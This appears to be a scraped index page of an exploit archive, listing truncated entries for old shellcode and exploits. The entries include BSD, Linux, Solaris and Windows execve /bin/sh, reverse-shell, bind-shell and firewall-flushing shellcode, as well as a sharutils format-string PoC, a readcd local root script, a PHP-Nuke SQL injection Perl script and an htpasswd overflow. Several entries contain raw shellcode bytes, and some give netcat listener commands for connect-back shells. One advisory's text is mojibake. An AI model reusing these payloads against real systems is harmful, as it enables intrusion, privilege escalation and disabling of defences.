bsd/x86 - connect 93 bytes

bsd/x86 connect 93 bytes. Shellcode exploit for bsdx86 platform / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id rus-sec /EFnet rootteam.host.sk BITS 32 jmp short path main: po...

bsd/x86 - reverse portbind 129 bytes

bsd/x86 reverse portbind 129 bytes. Shellcode exploit for bsdx86 platform / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on 6969/tcp / / [email protected] / char shellcode = 0x31,0xc9,0x51,0x41,...

linux/x86 - iptables -F 58 bytes

linux/x86 iptables -F 58 bytes. Shellcode exploit for linx86 platform / The shellcode flushs the iptables by running /sbin/iptables -F no exit greetz to zilion: man, my code is shorter! size = 58 bytes OS = Linux i386 written by /rootteam/dev0id www.sysworld.net BITS 32 jmp short callme main: pop...

linux/x86 ipchains -F 49 bytes

linux/x86 ipchains -F 49 bytes. Shellcode exploit for linx86 platform include include / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cero pushl %edx y ponemos los zeros del final del string en memoria pushw $0x46...

solaris/x86 execve /bin/sh toupper evasion 84 bytes

solaris/x86 execve /bin/sh toupper evasion 84 bytes. Shellcode exploit for solarisx86 platform / Solaris/x86 Used for toupper evasion look to the linux version for an explanation and usage example. / char c0de = / main: / "\xeb\x33" / jmp callz / / start: / "\x5e" / popl %esi / "\x8d\x06" / leal...

windows/XP-sp1 portshell on port 58821 116 bytes

windows/XP-sp1 portshell on port 58821 116 bytes. Shellcode exploit for win32 platform / 116 bytes bindcode hardcoded for Windows XP SP1 / / but you can change the address if you want / / i made it pretty clear where they are / / the bindcode will bind to port 58821 / / by silicon /...

bsd/x86 execve /bin/sh ENCRYPT* 57 bytes

Exploit for bsd/x86 platform in category shellcode ======================================== bsd/x86 execve /bin/sh ENCRYPT 57 bytes ======================================== / BSD version FreeBSD, OpenBSD, NetBSD. email protected 57 bytes. -Encriptado execve/bin/sh; Para mas informacion ver...

bsdi/x86 execve /bin/sh 46 bytes

No description provided by source. / BSDi execve of /bin/sh by v9 [email protected] / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. / "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" / 14 characters. /...

bsd/x86 execve /bin/sh setuid (0) 29 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...

bsd/x86 reverse portbind 129 bytes

Exploit for bsd/x86 platform in category shellcode ================================== bsd/x86 reverse portbind 129 bytes ================================== / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on...

linux/x86 xterm -ut -display [IP]:0 132 bytes

Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 xterm -ut -display IP:0 132 bytes ============================================= / Linux/x86 execve of /usr/X11R6/bin/xterm -ut -display ip:0, exit 127.0.0.1 is an example, you must change ...

GNU Sharutils <= 4.2.1 Local Format String PoC Exploit

No description provided by source. / GNU sharutils = 4.2.1 Local Format String POC Code C0ded by n4rk0tix a.k.a nrktx [email protected] Below is a l4m3 proof of concept code for da recently reported lame bug; These binaryz have not only format bugz, but also buffer overflowz,etc.We also...

CDRecord's ReadCD Local Root Privileges

Exploit for linux platform in category local exploits ======================================= CDRecord's ReadCD Local Root Privileges ======================================= !/bin/bash echo "readcd-exp.sh -- ReadCD local exploit Test on cdrecord-2.01-0.a27.2mdk" echo "Author : newbug at chroot.or...

PHP-Nuke SQL Injection Edit/Save Message(s) Bug

Exploit for unknown platform in category web applications =============================================== PHP-Nuke SQL Injection Edit/Save Messages Bug =============================================== !/usr/bin/perl use LWP; $log = "poskomenphpnukesavemsg.txt"; $Agent = "Mbahmubangga/1.0"; $proxy ...

htpasswd Apache 1.3.31 - Local Overflow

!/usr/bin/perl Proof Of Concept exploit for htpasswd of Apache. Read the advisory for more information. - Luiz Fernando Camargo - foxtrotatflowsecurity.org $shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"...

adv17.txt

+| Advisory 17. Search Engine & Directory by Turbo Seek Software: Search Engine & Directory Powered by Turbo Seek Vendor: FocalMedia.Net http://www.focalmedia.net Vulnerability: âîçìîæíîñòü ÷òåíèÿ ôàéëîâ Risk: ñðåäíèé Date: 10'Sept 2004 discovered by durito -duritoatmaildotru- HTTP: www.lwb57.org...

Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service

source: https://www.securityfocus.com/bid/11161/info Pingtel Xpressa handsets are reported prone to a remote denial of service vulnerability. The issue is reported to exist because of a lack of sufficient boundary checks performed on HTTP request data handled by the Xpressa administration web...

linux/x86 execve /bin/sh 24 bytes

No description provided by source. / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...

linux/x86 bsd/x86 execve /bin/sh 38 bytes

Exploit for multiple platform in category shellcode ========================================= linux/x86 bsd/x86 execve /bin/sh 38 bytes ========================================= / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68"...

linux/x86 execve /bin/sh xor encrypted 55 bytes

linux/x86 execve /bin/sh xor encrypted 55 bytes. Shellcode exploit for linx86 platform / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl...